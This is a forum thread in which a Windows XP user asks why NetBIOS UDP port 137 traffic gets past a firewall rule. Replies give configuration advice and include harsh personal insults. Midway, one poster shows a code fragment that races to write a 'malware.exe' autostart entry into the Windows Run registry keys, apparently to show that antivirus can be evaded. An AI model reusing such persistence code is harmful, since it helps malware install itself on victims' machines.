Udp traffic is not as critical as tcp traffic. Nevertheless, I seem not to be able to block some outgoing udp port 137 traffic (netbios-ns) from my system. My PSF shows a listening state, however no remote address (the executable is indicated as "system"). In my PSF I have a top rule denying any traffic on my port 137 to and from any remote port and address with any application. While this rule stops all the traffic where there is a visible remote address, it does not stop outgoing "system" traffic to unknown adresses.
Which automatic or enabled service may be responsible for that, if at all? Any other hints ?
(Win xp pro sp2, stand alone, cable connection, windows file sharing disabled)
So there is the system listening on a port. Why do you think, listening is related to talking? e.g.: Why should there be any traffic if there is just a process listening?
Are you on a router? If so, you will see traffic between your system and router on ports 137-139. Your firewall rule probably prohibits outgoing traffic to the Internet, but there will still be local communication with the router on those ports. If you're not using a router, then go into Control Panel>Network and Internet Connections>Network Commections - then right click your Connection - click on Properties>Networking - select Internet Protocol (TCP/IP) and click on >Properties>Advanced>WINS (tab)- then make sure "Disable NetBIOS over TCP/IP" is checked.
Unfortunately the real problem still isn't solved yet: gross incompetence. Because I don't think that the *official documentation* leaves any doubt on this point:
- This guys has no f****ng clue about his system, Windows, networking and TCP/IP, yet he wants to run a firewall and even achieve a decent level of security by doing so.
- He didn't even borther to read the f****ng^W fine manual, where Microsoft explicitly enumerates all relevant options regarding network communication
- Neither did he even try checking the most obvious option. Heck, if have you activated NetBIOS TCP/IP transports, you really shouldn't wonder about TCP/UDP traffic on ports 137-139. *It's supposed to work like that!*
How exactly do you think this will end? His firewall (that is none) will not provide any security, f*ck up his network and most likely pose as an additions attack vector. His system will submit other information using other protocols than NetBT, because he didn't even bother to configure it. He'll keep on brabbling nonsense about network protocols he doesn't understand, he ask further for even more misunderstood non-problems and achieve absolutely nothing at the end.
Sorry for me trying to point out to him that he's a clueless wannabe who should rather pay competent people for administrating his computer, like we're paying repair men to repair our cars, paying plumbers to fix our toilet and paying dumbsters to carry away our garbage.
Don't worry, this is the ugly german's way of "helping". That is also the reason why I do not write into German neswgroups.
"Jimbo" must be a real crack. I have neither the time nor do I feel like becoming one. I'm happy when my windows system and my antivirus software is up-to-date, and since my softwarefirewall shows my TCP ports being stealth in all free online test, such as GRC, Security Space, PC-Flank, HackerWatch and others I think I achieve a "decent" level of security. And I am well aware that there is no such thing as 100% security. I run neither a bank nor any other company, nor do I run a server, and I do observe the usual security measures when surfing and mailing. Why in gods sake should I be a target for an attack? That my new system was sending during a few days some UDP (not TCP) bytes on port 137 did not shock me, nor that possibly other protocols than netbios may send bytes to the world. Others may be paranoid, not me.
"trouble" as in "troublesome, but can be easily circumvented and even fails spontanously"? D'oh, even the RFC about NAT explicitly states that NAT is not intended or suitable as a security mechanism.
So? Which one is your antivirus software? I'd be happy to present you multiple security vulnerabilities that aren't even patched in the latest and most up-to-date version? Better not mentioning the security vulnerability in Windows that I recently reported...
you have a serious network problem.
you can't even be sure that your configuration works as expected, since you never bothered to run any test that is not totally f***ed up.
Must be interesting others, because based upon what you presented, there's no indication of any security.
Ah, the common argument to justify the common ignorance about the actual important criteria like reliability and accountability of security measures, yes, the ones you're lacking.
- because computer programs are not intelligent enough to differ between interesting and non-interesting target, that's why they simply target all
- because your system is a very easy target, with your "software firewall" you're actually opening it up for various remote exploits
That may be correct. Right now i'm using the latest version of Norman. If you know of any known and yet unpatched wholes (apart from latest viruses) pls let the community know. Indicate the ng if you post it elsewhere.
... and have not yet been patched by M$. Interesting. Pls expand on that. (My OS Win xp pro sp2 with IE 7, stand alone)
Ahm, please be a bit more specific.
All these tests are totally f***ed up? Can I read somewhere online some details about this rather tough qualification? But you will sure recommend to me and the world some non f***ed up ones which are freely availbale online.
Others include HackerWacker, webscan.security-check.ch, seccheck.onsite.ch, it-sec.de, as well as a number of specialized tests. But that means that I share this zero security with approx. 95 % or more of private windows users. If there's "no indication of any security" on my system I wonder how you would qualify those approx
80% of private windows users who have all doors wide open, unsecured wlans, IE on the lowest security levels for all sites, etc, etc.?
That is certainly true.
Not that easy! Cause I'm quite sure that I have it configured as welll as it can possibly be done.
So you think that my system could be a bot? and used for spamming the world? Highly unlikely. The symptons for that would be all to obvious. Btw. the udp bytes that my system sent on port 137 for a few days were regularly below 100 bytes.
You will certainly be able to contradict me in any of the above replies. Please do so. But be aware that you will not be able to turn me into becoming paranoid.
pthread p = getCurrentThread(); if (pCurrentThread == t1) { while(TRUE) RegWriteKeyEx(HKEY_LOCAL_MACHINE,L"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",L"pwn3d",REG_SZ,NULL,L"malware.exe); } if (pCurrentThread == t2) { while(TRUE) RegWriteKeyEx(HKEY_CURRENT_USER,L"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",L"pwn3d",REG_SZ,NULL,L"malware.exe); }
Don't worry, McAfee, Symantec and CA all have the same problem of validating volatile data directly in user-mode memory.
Don't worry, it's just a way how a non-privileged user can crash the entire system with a bluescreen. More details after the patch is released.
But, you know, I would have easily fixed it myself. Strange enough I can't find the source code in the Windows CDROM...
- not RFC conformant
- fucks up various network protocols
- fucks up load balancing
- creates tons of repeated traffic
You know, "stealth" is commonly considered as defective for a reason.
formatting link
and ff., just for a start. They all fail even simplest consistency checks.
formatting link
No mention of employing least privilege principle? No mention of secure configuration, which also includes shutting down unnecessary services?
Indeed.
Not any different. BTW, where's the difference on IE security settings? You could configure it maximally secure and still it could be trivially exploited.
Doesn't matter. It simply *is* the target. And even if not, it can be trivially circumvented (anyone dare to comment on overlapping IP fragments?).
Obvious to you? Doubtful.
So what? My malware would never even show up in these statistics. Neither would about any serious malware from the last ten years.
I'm not trying to. I'd jsut like to point out that you're much more clueless than you think, and that deploying non-understand and mis-understood (pseudo) security solutions won't help anything at all.
[scipt deleted] What did u want to prove with this script?
Well, Norman is one of the few with a sandbox technology that seems to belong to the best, viz.
formatting link
Ok, lets see what MS comes up with.
Suppose you are you talking of win xp in general and not of my situation in particular. If not, what makes you think like that?
Sorry, I don't understand that
I know this site. I do however not know of any similar site for e.g.
formatting link
or other scans mentioned.
Thanks, will try it out as well as some of the other scans recommended on this site. And report back.
Well, these were simply a few examples and not meant to be exhaustive. Bty I only use admin rights when needed and all unnecessary services for my stand alone Workstation are disabled based on infos from
formatting link
That is slightly exaggerated, to be on the very safe side.
Nothing is impossible was Toyota's claim in TV advertising. But you really seem to be a bit paranoid, according to you the average user should stay away from the internet and go back to the good old library ans snail mail.Therefore, I recommend the following for you:
formatting link
Yes my friend, obvious for me.
That may well be true for all people. Alredy Socrates ( or was it Plato?) said that all he knows was that he knows nothing. ;-)
Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here.
All logos and trade names are the property of their respective owners.